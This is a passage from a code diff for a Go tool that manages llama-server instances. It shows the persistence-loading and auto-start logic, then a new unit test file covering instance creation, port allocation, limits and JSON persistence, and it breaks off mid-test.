return nil // No instances directory, start fresh
|
||||
}
|
||||
|
||||
// Read all JSON files from instances directory
|
||||
files, err := os.ReadDir(im.instancesConfig.InstancesDir)
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to read instances directory: %w", err)
|
||||
}
|
||||
|
||||
loadedCount := 0
|
||||
for _, file := range files {
|
||||
if file.IsDir() || !strings.HasSuffix(file.Name(), ".json") {
|
||||
continue
|
||||
}
|
||||
|
||||
instanceName := strings.TrimSuffix(file.Name(), ".json")
|
||||
instancePath := filepath.Join(im.instancesConfig.InstancesDir, file.Name())
|
||||
|
||||
if err := im.loadInstance(instanceName, instancePath); err != nil {
|
||||
log.Printf("Failed to load instance %s: %v", instanceName, err)
|
||||
continue
|
||||
}
|
||||
|
||||
loadedCount++
|
||||
}
|
||||
|
||||
if loadedCount > 0 {
|
||||
log.Printf("Loaded %d instances from persistence", loadedCount)
|
||||
// Auto-start instances that have auto-restart enabled
|
||||
go im.autoStartInstances()
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// loadInstance loads a single instance from its JSON file
|
||||
func (im *instanceManager) loadInstance(name, path string) error {
|
||||
data, err := os.ReadFile(path)
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to read instance file: %w", err)
|
||||
}
|
||||
|
||||
var persistedInstance instance.Process
|
||||
if err := json.Unmarshal(data, &persistedInstance); err != nil {
|
||||
return fmt.Errorf("failed to unmarshal instance: %w", err)
|
||||
}
|
||||
|
||||
// Validate the instance name matches the filename
|
||||
if persistedInstance.Name != name {
|
||||
return fmt.Errorf("instance name mismatch: file=%s, instance.Name=%s", name, persistedInstance.Name)
|
||||
}
|
||||
|
||||
// Create new inst using NewInstance (handles validation, defaults, setup)
|
||||
inst := instance.NewInstance(name, &im.instancesConfig, persistedInstance.GetOptions())
|
||||
|
||||
// Restore persisted fields that NewInstance doesn't set
|
||||
inst.Created = persistedInstance.Created
|
||||
inst.Running = persistedInstance.Running
|
||||
|
||||
// Check for port conflicts and add to maps
|
||||
if inst.GetOptions() != nil && inst.GetOptions().Port > 0 {
|
||||
port := inst.GetOptions().Port
|
||||
if im.ports[port] {
|
||||
return fmt.Errorf("port conflict: instance %s wants port %d which is already in use", name, port)
|
||||
}
|
||||
im.ports[port] = true
|
||||
}
|
||||
|
||||
im.instances[name] = inst
|
||||
return nil
|
||||
}
|
||||
|
||||
// autoStartInstances starts instances that were running when persisted and have auto-restart enabled
|
||||
func (im *instanceManager) autoStartInstances() {
|
||||
im.mu.RLock()
|
||||
var instancesToStart []*instance.Process
|
||||
for _, inst := range im.instances {
|
||||
if inst.Running && // Was running when persisted
|
||||
inst.GetOptions() != nil &&
|
||||
inst.GetOptions().AutoRestart != nil &&
|
||||
*inst.GetOptions().AutoRestart {
|
||||
instancesToStart = append(instancesToStart, inst)
|
||||
}
|
||||
}
|
||||
im.mu.RUnlock()
|
||||
|
||||
for _, inst := range instancesToStart {
|
||||
log.Printf("Auto-starting instance %s", inst.Name)
|
||||
// Reset running state before starting (since Start() expects stopped instance)
|
||||
inst.Running = false
|
||||
if err := inst.Start(); err != nil {
|
||||
log.Printf("Failed to auto-start instance %s: %v", inst.Name, err)
|
||||
}
|
||||
}
|
||||
}
|
||||
892
pkg/manager/manager_test.go
Normal file
892
pkg/manager/manager_test.go
Normal file
@@ -0,0 +1,892 @@
|
||||
package manager_test
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"llamactl/pkg/backends/llamacpp"
|
||||
"llamactl/pkg/config"
|
||||
"llamactl/pkg/instance"
|
||||
"llamactl/pkg/manager"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"reflect"
|
||||
"strings"
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestNewInstanceManager(t *testing.T) {
|
||||
cfg := config.InstancesConfig{
|
||||
PortRange: [2]int{8000, 9000},
|
||||
LogsDir: "/tmp/test",
|
||||
MaxInstances: 5,
|
||||
LlamaExecutable: "llama-server",
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
}
|
||||
|
||||
manager := manager.NewInstanceManager(cfg)
|
||||
if manager == nil {
|
||||
t.Fatal("NewInstanceManager returned nil")
|
||||
}
|
||||
|
||||
// Test initial state
|
||||
instances, err := manager.ListInstances()
|
||||
if err != nil {
|
||||
t.Fatalf("ListInstances failed: %v", err)
|
||||
}
|
||||
if len(instances) != 0 {
|
||||
t.Errorf("Expected empty instance list, got %d instances", len(instances))
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_Success(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
|
||||
inst, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
if inst.Name != "test-instance" {
|
||||
t.Errorf("Expected instance name 'test-instance', got %q", inst.Name)
|
||||
}
|
||||
if inst.Running {
|
||||
t.Error("New instance should not be running")
|
||||
}
|
||||
if inst.GetOptions().Port != 8080 {
|
||||
t.Errorf("Expected port 8080, got %d", inst.GetOptions().Port)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_DuplicateName(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
options1 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options2 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
// Create first instance
|
||||
_, err := manager.CreateInstance("test-instance", options1)
|
||||
if err != nil {
|
||||
t.Fatalf("First CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Try to create duplicate
|
||||
_, err = manager.CreateInstance("test-instance", options2)
|
||||
if err == nil {
|
||||
t.Error("Expected error for duplicate instance name")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "already exists") {
|
||||
t.Errorf("Expected duplicate name error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_MaxInstancesLimit(t *testing.T) {
|
||||
// Create manager with low max instances limit
|
||||
cfg := config.InstancesConfig{
|
||||
PortRange: [2]int{8000, 9000},
|
||||
MaxInstances: 2, // Very low limit for testing
|
||||
}
|
||||
manager := manager.NewInstanceManager(cfg)
|
||||
|
||||
options1 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options2 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options3 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
// Create instances up to the limit
|
||||
_, err := manager.CreateInstance("instance1", options1)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||
}
|
||||
|
||||
_, err = manager.CreateInstance("instance2", options2)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 2 failed: %v", err)
|
||||
}
|
||||
|
||||
// This should fail due to max instances limit
|
||||
_, err = manager.CreateInstance("instance3", options3)
|
||||
if err == nil {
|
||||
t.Error("Expected error when exceeding max instances limit")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "maximum number of instances") && !strings.Contains(err.Error(), "limit") {
|
||||
t.Errorf("Expected max instances error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_PortAssignment(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
// Create instance without specifying port
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
inst, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Should auto-assign a port in the range
|
||||
port := inst.GetOptions().Port
|
||||
if port < 8000 || port > 9000 {
|
||||
t.Errorf("Expected port in range 8000-9000, got %d", port)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_PortConflictDetection(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
options1 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080, // Explicit port
|
||||
},
|
||||
}
|
||||
|
||||
options2 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model2.gguf",
|
||||
Port: 8080, // Same port - should conflict
|
||||
},
|
||||
}
|
||||
|
||||
// Create first instance
|
||||
_, err := manager.CreateInstance("instance1", options1)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||
}
|
||||
|
||||
// Try to create second instance with same port
|
||||
_, err = manager.CreateInstance("instance2", options2)
|
||||
if err == nil {
|
||||
t.Error("Expected error for port conflict")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "conflict") && !strings.Contains(err.Error(), "in use") {
|
||||
t.Errorf("Expected port conflict error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_MultiplePortAssignment(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
options1 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options2 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
// Create multiple instances and verify they get different ports
|
||||
instance1, err := manager.CreateInstance("instance1", options1)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||
}
|
||||
|
||||
instance2, err := manager.CreateInstance("instance2", options2)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 2 failed: %v", err)
|
||||
}
|
||||
|
||||
port1 := instance1.GetOptions().Port
|
||||
port2 := instance2.GetOptions().Port
|
||||
|
||||
if port1 == port2 {
|
||||
t.Errorf("Expected different ports, both got %d", port1)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_PortExhaustion(t *testing.T) {
|
||||
// Create manager with very small port range
|
||||
cfg := config.InstancesConfig{
|
||||
PortRange: [2]int{8000, 8001}, // Only 2 ports available
|
||||
MaxInstances: 10, // Higher than available ports
|
||||
}
|
||||
manager := manager.NewInstanceManager(cfg)
|
||||
|
||||
options1 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options2 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options3 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
// Create instances to exhaust all ports
|
||||
_, err := manager.CreateInstance("instance1", options1)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||
}
|
||||
|
||||
_, err = manager.CreateInstance("instance2", options2)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 2 failed: %v", err)
|
||||
}
|
||||
|
||||
// This should fail due to port exhaustion
|
||||
_, err = manager.CreateInstance("instance3", options3)
|
||||
if err == nil {
|
||||
t.Error("Expected error when ports are exhausted")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "available") {
|
||||
t.Errorf("Expected port exhaustion error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestDeleteInstance_PortRelease(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
|
||||
// Create instance with specific port
|
||||
_, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Delete the instance
|
||||
err = manager.DeleteInstance("test-instance")
|
||||
if err != nil {
|
||||
t.Fatalf("DeleteInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Should be able to create new instance with same port
|
||||
_, err = manager.CreateInstance("new-instance", options)
|
||||
if err != nil {
|
||||
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestGetInstance_Success(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
// Create an instance first
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
created, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Retrieve it
|
||||
retrieved, err := manager.GetInstance("test-instance")
|
||||
if err != nil {
|
||||
t.Fatalf("GetInstance failed: %v", err)
|
||||
}
|
||||
|
||||
if retrieved.Name != created.Name {
|
||||
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
|
||||
}
|
||||
}
|
||||
|
||||
func TestGetInstance_NotFound(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
_, err := manager.GetInstance("nonexistent")
|
||||
if err == nil {
|
||||
t.Error("Expected error for nonexistent instance")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "not found") {
|
||||
t.Errorf("Expected 'not found' error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestListInstances(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
// Initially empty
|
||||
instances, err := manager.ListInstances()
|
||||
if err != nil {
|
||||
t.Fatalf("ListInstances failed: %v", err)
|
||||
}
|
||||
if len(instances) != 0 {
|
||||
t.Errorf("Expected 0 instances, got %d", len(instances))
|
||||
}
|
||||
|
||||
// Create some instances
|
||||
options1 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options2 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
_, err = manager.CreateInstance("instance1", options1)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||
}
|
||||
|
||||
_, err = manager.CreateInstance("instance2", options2)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 2 failed: %v", err)
|
||||
}
|
||||
|
||||
// List should return both
|
||||
instances, err = manager.ListInstances()
|
||||
if err != nil {
|
||||
t.Fatalf("ListInstances failed: %v", err)
|
||||
}
|
||||
if len(instances) != 2 {
|
||||
t.Errorf("Expected 2 instances, got %d", len(instances))
|
||||
}
|
||||
|
||||
// Check names are present
|
||||
names := make(map[string]bool)
|
||||
for _, inst := range instances {
|
||||
names[inst.Name] = true
|
||||
}
|
||||
if !names["instance1"] || !names["instance2"] {
|
||||
t.Error("Expected both instance1 and instance2 in list")
|
||||
}
|
||||
}
|
||||
|
||||
func TestDeleteInstance_Success(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
// Create an instance
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
_, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Delete it
|
||||
err = manager.DeleteInstance("test-instance")
|
||||
if err != nil {
|
||||
t.Fatalf("DeleteInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Should no longer exist
|
||||
_, err = manager.GetInstance("test-instance")
|
||||
if err == nil {
|
||||
t.Error("Instance should not exist after deletion")
|
||||
}
|
||||
}
|
||||
|
||||
func TestDeleteInstance_NotFound(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
err := manager.DeleteInstance("nonexistent")
|
||||
if err == nil {
|
||||
t.Error("Expected error for deleting nonexistent instance")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "not found") {
|
||||
t.Errorf("Expected 'not found' error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestUpdateInstance_Success(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
// Create an instance
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
_, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Update it
|
||||
newOptions := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/new-model.gguf",
|
||||
Port: 8081,
|
||||
},
|
||||
}
|
||||
|
||||
updated, err := manager.UpdateInstance("test-instance", newOptions)
|
||||
if err != nil {
|
||||
t.Fatalf("UpdateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
if updated.GetOptions().Model != "/path/to/new-model.gguf" {
|
||||
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().Model)
|
||||
}
|
||||
if updated.GetOptions().Port != 8081 {
|
||||
t.Errorf("Expected port 8081, got %d", updated.GetOptions().Port)
|
||||
}
|
||||
}
|
||||
|
||||
func TestUpdateInstance_NotFound(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
_, err := manager.UpdateInstance("nonexistent", options)
|
||||
if err == nil {
|
||||
t.Error("Expected error for updating nonexistent instance")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "not found") {
|
||||
t.Errorf("Expected 'not found' error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestPersistence_InstancePersistedOnCreation(t *testing.T) {
|
||||
// Create temporary directory for persistence
|
||||
tempDir := t.TempDir()
|
||||
|
||||
cfg := config.InstancesConfig{
|
||||
PortRange: [2]int{8000, 9000},
|
||||
InstancesDir: tempDir,
|
||||
MaxInstances: 10,
|
||||
}
|
||||
manager := manager.NewInstanceManager(cfg)
|
||||
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
|
||||
// Create instance
|
||||
_, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Check that JSON file was created
|
||||
expectedPath := filepath.Join(tempDir, "test-instance.json")
|
||||
if _, err := os.Stat(expectedPath); os.IsNotExist(err) {
|
||||
t.Errorf("Expected persistence file %s to exist", expectedPath)
|
||||
}
|
||||
|
||||
// Verify file contains correct data
|
||||
data, err := os.ReadFile(expectedPath)
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to read persistence file: %v", err)
|
||||
}
|
||||
|
||||
var persistedInstance map[string]interface{}
|
||||
if err := json.Unmarshal(data, &persistedInstance); err != nil {
|
||||
t.Fatalf("Failed to unmarshal persisted data: %v", err)
|
||||
}
|
||||
|
||||
if persistedInstance["name"] != "test-instance" {
|
||||
t.Errorf("Expected name 'test-instance', got %v", persistedInstance["name"])
|
||||
}
|
||||
}
|
||||
|
||||
func TestPersistence_InstancePersistedOnUpdate(t *testing.T) {
|
||||
tempDir := t.TempDir()
|
||||
|
||||
cfg := config.InstancesConfig{
|
||||
PortRange: [2]int{8000, 9000},
|
||||
InstancesDir: tempDir,
|
||||
MaxInstances: 10,
|
||||
}
|
||||
manager := manager.NewInstanceManager(cfg)
|
||||
|
||||
// Create instance
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
_, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Update instance
|
||||
newOptions := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/new-model.gguf",
|
||||
Port: 8081,
|
||||
},
|
||||
}
|
||||
_, err = manager.UpdateInstance("test-instance", newOptions)
|
||||
if err != nil {
|
||||
t.Fatalf("UpdateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Verify persistence file was updated
|
||||
expectedPath := filepath.Join(tempDir, "test-instance.json")
|
||||
data, err := os.ReadFile(expectedPath)
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to read persistence file: %v", err)
|
||||
}
|
||||
|
||||
var persistedInstance map[string]interface{}
|
||||
if err := json.Unmarshal(data, &persistedInstance); err != nil {
|
||||
t.Fatalf("Failed to unmarshal persisted data: %v", err)
|
||||
}
|
||||
|
||||
// Check that the options were updated
|
||||
options_data, ok := persistedInstance["options"].(map[string]interface{})
|
||||
if !ok {
|
||||
t.Fatal("Expected options to be present in persisted data")
|
||||
}
|
||||
|
||||
if options_data["model"] != "/path/to/new-model.gguf" {
|
||||
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %v", options_data["model"])
|
||||
}
|
||||
}
|
||||
|
||||
func TestPersistence_InstanceFileDeletedOnDeletion(t *testing.T) {
|
||||
tempDir := t.TempDir()
|
||||
|
||||
cfg := config.InstancesConfig{
|
||||
PortRange: [2]int{8000, 9000},
|
||||
InstancesDir: tempDir,
|
||||
MaxInstances: 10,
|
||||
}
|
||||
manager := manager.NewInstanceManager(cfg)
|
||||
|
||||
// Create instance
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
_, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
expectedPath := filepath.Join(tempDir, "test-instance.json")
|
||||
|
||||
// Verify file exists
|
||||
if _, err := os.Stat(expectedPath); os.IsNotExist(err) {
|
||||
t.Fatal("Expected persistence file to exist before deletion")
|
||||
}
|
||||
|
||||
// Delete instance
|
||||
err = manager.DeleteInstance("test-instance")
|
||||
if err != nil {
|
||||
t.Fatalf("DeleteInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Verify file was deleted
|
||||
if _, err := os.Stat(expectedPath); !os.IsNotExist(err) {
|
||||
t.Error("Expected persistence file to be deleted")
|
||||
}
|
||||
}
|
||||
|
||||
func TestPersistence_InstancesLoadedFromDisk(t *testing.T) {
|
||||
tempDir := t.TempDir()
|
||||
|
||||
// Create JSON files manually (simulating previous run)
|
||||
instance1JSON := `{
|
||||
"name": "instance1",
|
||||
"running": false,
|
||||
"options": {
|
||||
"model": "/path/to/model1.gguf",
|
||||
"port": 8080
|
||||
}
|
||||
}`
|
||||
|
||||
instance2JSON := `{
|
||||
"name": "instance2",
|
||||
"running": false,
|
||||
"options": {
|
||||
"model": "/path/to/model2.gguf",
|
||||
"port": 8081
|
||||
}
|
||||
}`
|
||||
|
||||
// Write JSON files
|
||||
err := os.WriteFile(filepath.Join(tempDir, "instance1.json"), []byte(instance1JSON), 0644)
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to write test JSON file: %v", err)
|
||||
}
|
||||
|
||||
err = os.WriteFile(filepath.Join(tempDir, "instance2.json"), []byte(instance2JSON), 0644)
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to write test JSON file: %v", err)
|
||||
}
|
||||
|
||||
// Create manager - should load instances from disk
|
||||
cfg := config.InstancesConfig{
|
||||
PortRange: [2]int{8000, 9000},
|
||||
InstancesDir: tempDir,
|
||||
MaxInstances: 10,
|
||||
}
|
||||
manager := manager.NewInstanceManager(cfg)
|
||||
|
||||
// Verify instances were loaded
|
||||
instances, err := manager.ListInstances()
|
||||
if err != nil {
|
||||
t.Fatalf("ListInstances failed: %v", err)
|
||||
}
|
||||
|
||||
if len(instances) != 2 {
|
||||
t.Fatalf("Expected 2 loaded instances, got %d", len(instances))
|
||||
}
|
||||
|
||||
// Check instances by name
|
||||
instancesByName := make(map[string]*instance.Process)
|
||||
for _, inst := range instances {
|
||||
instancesByName[inst.Name] = inst
|
||||
}
|
||||
|
||||
instance1, exists := instancesByName["instance1"]
|
||||
if !exists {
|
||||
t.Error("Expected instance1 to be loaded")
|
||||
} else {
|
||||
if instance1.GetOptions().Model != "/path/to/model1.gguf" {
|
||||
t.Errorf("Expected model '/path/to/model1.gguf', got %q", instance1.GetOptions().Model)
|
||||
}
|
||||
if instance1.GetOptions().Port != 8080 {
|
||||
t.Errorf("Expected port 8080, got %d", instance1.GetOptions().Port)
|
||||
}
|
||||
}
|
||||
|
||||
instance2, exists := instancesByName["instance2"]
|
||||
if !exists {
|
||||
t.Error("Expected instance2 to be loaded")
|
||||
} else {
|
||||
if instance2.GetOptions().Model != "/path/to/model2.gguf" {
|
||||
t.Errorf("Expected model '/path/to/model2.gguf', got %q", instance2.GetOptions().Model)
|
||||
}
|
||||
if instance2.GetOptions().Port != 8081 {
|
||||
t.Errorf("Expected port 8081, got %d", instance2.GetOptions().Port)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestPersistence_PortMapPopulatedFromLoadedInstances(t *testing.T) {
|
||||
tempDir := t.TempDir()
|
||||
|
||||
// Create JSON file with specific port
|
||||
instanceJSON := `{
|
||||
"name": "test-instance",
|
||||
"running": false,
|
||||
"options": {
|
||||
"model": "/path/to/model.gguf",
|
||||
"port": 8080
|
||||
}
|
||||
}`
|
||||
|
||||
err := os.WriteFile(filepath.Join(tempDir, "test-instance.json"), []byte(instanceJSON), 0644)
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to write test JSON file: %v", err)
|
||||
}
|
||||
|
||||
// Create manager - should load instance and register port
|
||||
cfg := config.InstancesConfig{
|
||||
PortRange: [2]int{8000, 9000},
|
||||
InstancesDir: tempDir,
|
||||
MaxInstances: 10,
|
||||
}
|
||||
manager := manager.NewInstanceManager(cfg)
|
||||
|
||||
// Try to create new instance with same port - should fail due to conflict
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model2.gguf",
|
||||
Port: 8080, // Same port as loaded instance
|
||||
},
|
||||
}
|
||||
|
||||
_, err = manager.CreateInstance("new-instance", options)
|
||||
if err == nil {
|
||||
t.Error("Expected error for port conflict with loaded instance")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "port") || !strings.Contains(err.Error(), "in use") {
|
||||
t.Errorf("Expected port conflict error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestPersistence_CompleteInstanceDataRoundTrip(t *testing.T) {
|
||||
tempDir := t.TempDir()
|
||||
|
||||
cfg := config.InstancesConfig{
|
||||
PortRange: [2]int{8000, 9000},
|
||||
InstancesDir: tempDir,
|
||||
MaxInstances: 10,
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
}
|
||||
|
||||
// Create first manager and instance with comprehensive options
|
||||
manager1 := manager.NewInstanceManager(cfg)
|
||||
|
||||
autoRestart := false
|
||||
maxRestarts := 10
|
||||
restartDelay := 30
|
||||
|
||||
originalOptions := &instance.CreateInstanceOptions{
|
||||
AutoRestart: &autoRestart,
|
||||
MaxRestarts: &maxRestarts,
|
||||
RestartDelay: &restartDelay,
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
Host: "localhost",
|
||||
CtxSize: 4096,
|
||||
GPULayers: 32,
|
||||
Temperature: 0.7,
|
||||
TopK: 40,
|
||||
TopP: 0.9,
|
||||
Verbose: true,
|
||||
FlashAttn: false,
|
||||
Lora: []string{"adapter1.bin", "adapter2.bin"},
|
||||
HFRepo: "microsoft/DialoGPT-medium",
|
||||
},
|
||||
}
|
||||
|
||||
originalInstance, err := manager1.CreateInstance("roundtrip-test", originalOptions)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
